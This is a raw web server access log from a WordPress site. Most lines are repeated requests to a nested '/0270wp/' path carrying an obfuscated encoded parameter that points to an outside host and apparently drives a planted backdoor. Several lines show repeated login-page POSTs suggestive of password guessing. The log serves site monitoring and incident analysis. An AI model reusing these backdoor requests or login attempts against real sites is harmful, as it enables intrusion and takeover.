179.188.53.243 - - [17/Mar/2026:02:30:20 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393032302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353432302q3963663666653766386633303464633533353166386561383936616230646334222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:30:42 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393034322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353434322q3161373961356635303863653166363631356435616436646361653030303666222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:31:04 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393036342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353436342q6330376265383533363530663266656132653338363963373037646439643738222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:31:25 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393038352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353438352q3835383665613631646330323136366234346534306339613665373963316462222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:31:46 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393130362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353530362q3334316564313131383730343832316662626137343733316263616436656334222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:32:07 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393132372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353532372q6237383332323330623665306433306261613537346530303631373336333866222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:32:28 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393134382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353534382q3638633134633465316163653838373665336261376234336632393130336135222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:32:50 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393137302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353537302q6235623233633966643661643535396134316137326561313464343364306466222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:33:11 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393139312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353539312q3033306462663536323232303933643366363133346635336530396438613837222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
118.139.167.171 - - [17/Mar/2026:02:38:23 -0300] "GET /wp-login.php HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; SMJB; rv:11.0) like Gecko"
118.139.167.171 - - [17/Mar/2026:02:38:26 -0300] "POST /wp-login.php HTTP/1.1" 200 74371 "https://bandeirantesbombas.com.br/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; SMJB; rv:11.0) like Gecko"
179.188.53.243 - - [17/Mar/2026:02:33:32 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393231322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353631322q6139353132386135383136613538393262343936643832623439643263323334222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:33:53 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393233332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353633332q3832306538323037363065316533363036346430613738653536356132393436222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:34:14 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393235342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353635342q6235316436633331363663383963393630353632333032643638343139626234222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:34:35 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393237352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353637352q6632336633333539386530363266383465363561343035313934373861333765222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:34:56 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393239362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353639362q3663303336373538353136383830313564393732306663346231663538363164222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
74.7.244.31 - - [17/Mar/2026:02:40:12 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [17/Mar/2026:02:35:17 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393331372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353731372q3135663130353335623431376236636231333161343332653464393165313062222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:35:38 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393333382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353733382q3732386238316336363533353439346430383236373461653365363933353663222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:36:00 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393336302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353736302q3964333765353134373634393638373534343265376365363533323566653635222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:36:21 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393338312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353738312q3839393765653334393639303163663831336333333735663238643934386535222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:36:42 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393430322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353830322q6433666233343461663866666164303438393063636262613930396432323836222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:37:03 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393432332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353832332q3637346266386264643339333739623565393262353563346132336439396566222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
66.249.74.169 - - [17/Mar/2026:02:42:08 -0300] "GET /?u=fca86fwe39639embgpjlc HTTP/1.1" 200 206924 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
179.188.53.243 - - [17/Mar/2026:02:37:24 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393434342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353834342q3963326439333965326564303730383139323132353132303836633663663530222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:37:45 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393436352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353836352q6362353563313935356530356565636635313538323865633261356166326136222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
95.85.238.35 - - [17/Mar/2026:02:43:02 -0300] "GET /wp-login.php HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
179.188.53.243 - - [17/Mar/2026:02:38:07 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393438372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353838372q6366393030333062323331383935663038613663343336646664373036373361222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:38:28 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393530382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353930382q6330393130346132653334343732363765616262656161653962363862383661222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:38:49 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393532392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353932392q3330643637663266326538626235343531333261396464343638343864376335222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:39:10 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393535302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353935302q6439666232303064613638376536636136656261366339366666383631386635222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:39:31 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393537312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353937312q3539306231663662366464393038363635383565363765383936653666393865222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:39:52 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393539322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732353939322q6635333839643831616135383231623262393030633937656131393531383065222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:40:13 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393631332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363031332q3664336135323162623664396466393164373831386161613432626635316439222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:40:34 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393633342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363033342q6462376533663930393865323064346431633962653034333538373761333232222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
74.7.244.31 - - [17/Mar/2026:02:45:39 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [17/Mar/2026:02:40:56 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393635362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363035362q6131303634323932396338313463333730616561623437643934333261626639222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:41:17 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393637372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363037372q6534663162303630333261353862616439616164316166623936373062653532222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:41:38 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393639382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363039382q6466306165383336343264396632616665303630643533653764656335393632222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:41:59 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393731392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363131392q3435633236373739316439613434313339653564376264363538353530333166222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:42:21 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393734312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363134312q3762373162313037656362646634313232326465636564633930636136643636222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
74.7.228.16 - - [17/Mar/2026:02:47:22 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [17/Mar/2026:02:42:42 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393736322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363136322q3064333661323963356462616165633463643430623063653730656136613333222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:43:03 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393738332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363138332q3635313735623735336332323638386663633065386332373338643538666663222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
37.59.29.69 - - [17/Mar/2026:02:48:07 -0300] "GET /wp-login.php HTTP/1.1" 200 74371 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; InfoPath.3; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
37.59.29.69 - - [17/Mar/2026:02:48:09 -0300] "POST /wp-login.php HTTP/1.1" 200 74371 "https://bandeirantesbombas.com.br/wp-login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; InfoPath.3; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
50.6.225.58 - - [17/Mar/2026:02:48:10 -0300] "GET /wp-login.php HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; SMJB; rv:11.0) like Gecko"
50.6.225.58 - - [17/Mar/2026:02:48:11 -0300] "POST /wp-login.php HTTP/1.1" 200 74371 "https://bandeirantesbombas.com.br/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; SMJB; rv:11.0) like Gecko"
179.188.53.243 - - [17/Mar/2026:02:43:25 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393830352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363230352q6538656363656665613166373266333039333464643661613537306561393532222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:43:47 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393832372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363232372q3339623535613438656338376339386131356339366137363033613637366339222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
